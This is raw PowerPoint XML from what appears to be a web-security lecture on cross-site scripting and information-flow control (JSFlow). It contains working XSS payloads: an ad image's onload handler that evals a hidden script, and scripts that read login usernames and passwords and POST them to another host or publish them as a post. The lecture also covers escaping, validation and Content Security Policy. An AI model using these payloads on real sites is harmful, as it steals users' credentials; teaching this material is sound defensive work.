                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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ektangel med rundade hörn 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072076" y="5735136"/>
            <a:ext cx="1350819" cy="21352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shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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Rundad rektangulär 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796245" y="3249124"/>
            <a:ext cx="1360775" cy="692706"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRect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Grab the password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rundad rektangulär 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6599830" y="3941830"/>
            <a:ext cx="1360775" cy="692706"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRect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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ut it in a new post</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rundad rektangulär 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2884332" y="5733030"/>
            <a:ext cx="1360775" cy="692706"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75379"/>
              <a:gd name="adj2" fmla="val -3511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 post it!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10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7" name="Underrubrik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injection via XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Bildobjekt 7" descr="img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859" y="613726"/>
            <a:ext cx="1281545" cy="128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71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Performing the attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="Screen Shot 2015-08-10 at 13.45.5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9144000" cy="558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030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Falling for the attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="Screen Shot 2015-08-10 at 13.46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9144000" cy="558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3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Aww</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, snap!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="Screen Shot 2015-08-10 at 13.46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9144000" cy="558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58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protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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812161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Solution: input validation and escaping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Whitelist input validation if possible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Use a Security Encoding Library – better chance of security than writing your own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validation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Possible way forward in this case and frequently applied in similar applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="640080" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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Example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&lt;script&gt;alert(‘Danger!’)&lt;/script&gt; becomes when escaped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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt;script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('Danger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!’) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;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Escaping may be bypassed if not careful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1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lvl="2"/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Use Content Security Policies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HTTP response header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Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>content only from origin and scripts from origin and the given static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domain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Not possible with current implementation; we serve scripts from the same domain as the user created content is served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Moving target defense; randomize JavaScript syntax/API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Requires browser support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ktangel med rundade hörn 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824846" y="4974999"/>
            <a:ext cx="7521776" cy="32272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1600" dirty="0"/>
              <a:t>Content-Security-Policy: default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: ‘self’; script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: ‘self’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>static.domain.tld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0779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JSFlow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – the XSS attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt 2" descr="Screen Shot 2015-08-10 at 15.11.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0"/>
            <a:ext cx="8283462" cy="554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416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information flow control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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 the hood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865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innehåll 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380999" y="1884011"/>
            <a:ext cx="8407893" cy="4655468"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>href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="http://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www.company.com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"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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   &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>img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class="pure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>img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-responsive" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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marL="45720" indent="0">
              <a:buNone/>
            </a:pP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           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src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="http://localhost:4999/ads/ad2.png"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>onload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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementById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('evil').text);"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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   &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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&lt;script id="evil"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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"/>
                <a:cs typeface="Courier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login = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementById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("login");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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 if (login) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>login.addEventListener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("click", function () {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier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username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementsByName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("username")[0].value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier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password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementsByName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("password")[0].value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier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/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>url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= "http://localhost:4777/paste";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier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/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req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= new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>XMLHttpRequest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();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.open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("POST", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>url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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.setRequestHeader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("Content-type”,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/>
            </a:r>
            <a:b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</a:b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			    "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application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>urlencoded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");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.send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("username=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>encodeURIComponent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(username) + </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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              "&amp;password=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>encodeURIComponent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(password));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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   });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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 } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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IFC in practice – the ad attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rektangel med rundade hörn 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2935977" y="4264310"/>
            <a:ext cx="5731752" cy="24615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shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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Rektangel med rundade hörn 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179339" y="5422706"/>
            <a:ext cx="6556464" cy="422563"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="150000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="34000">
                <a:schemeClr val="accent6">
                  <a:shade val="70000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="70000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="90000"/>
                  <a:satMod val="140000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6">
                  <a:tint val="100000"/>
                  <a:shade val="100000"/>
                  <a:satMod val="100000"/>
                  <a:alpha val="7000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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Frihandsfigur 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2323860" y="3838346"/>
            <a:ext cx="3848100" cy="496121"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 3848100 w 3848100"/>
              <a:gd name="connsiteY0" fmla="*/ 501679 h 520729"/>
              <a:gd name="connsiteX1" fmla="*/ 1555750 w 3848100"/>
              <a:gd name="connsiteY1" fmla="*/ 29 h 520729"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 3848100"/>
              <a:gd name="connsiteY2" fmla="*/ 520729 h 520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48100" h="520729">
                <a:moveTo>
                  <a:pt x="3848100" y="501679"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3022600" y="249266"/>
                  <a:pt x="2197100" y="-3146"/>
                  <a:pt x="1555750" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="914400" y="3204"/>
                  <a:pt x="0" y="520729"/>
                  <a:pt x="0" y="520729"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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Bildobjekt 7" descr="Dialog-stop_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76" y="5526467"/>
            <a:ext cx="263255" cy="25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09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80999" y="1684300"/>
            <a:ext cx="8407893" cy="517369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Simplicity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(virtually) installation free – Software as a Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seamless integration of features, e.g., other software services</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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Availability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of user content and data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multiple platforms, phones, tablets and computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>freemium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> subscription common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1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Collaboration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sharing – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imgur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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>github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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bitbucket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r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> …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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocial networking – Facebook, Google Plus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vivino</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user created content</a:t>
            </a:r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Web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458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innehåll 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354367" y="2028649"/>
            <a:ext cx="8407893" cy="4482301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&lt;script&gt;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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> login = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("login");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if (login) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>login.addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("click", function () {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementsByName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("username")[0].value;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementsByName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("password")[0].value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> data = '{ "name” : "' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(username) +' ",' + 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'  "title”: "XSS, I have been owned!",' +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'  "text” : "My password is ' + </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>		      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(password) +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                 '"}';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var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req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>XMLHttpRequest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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
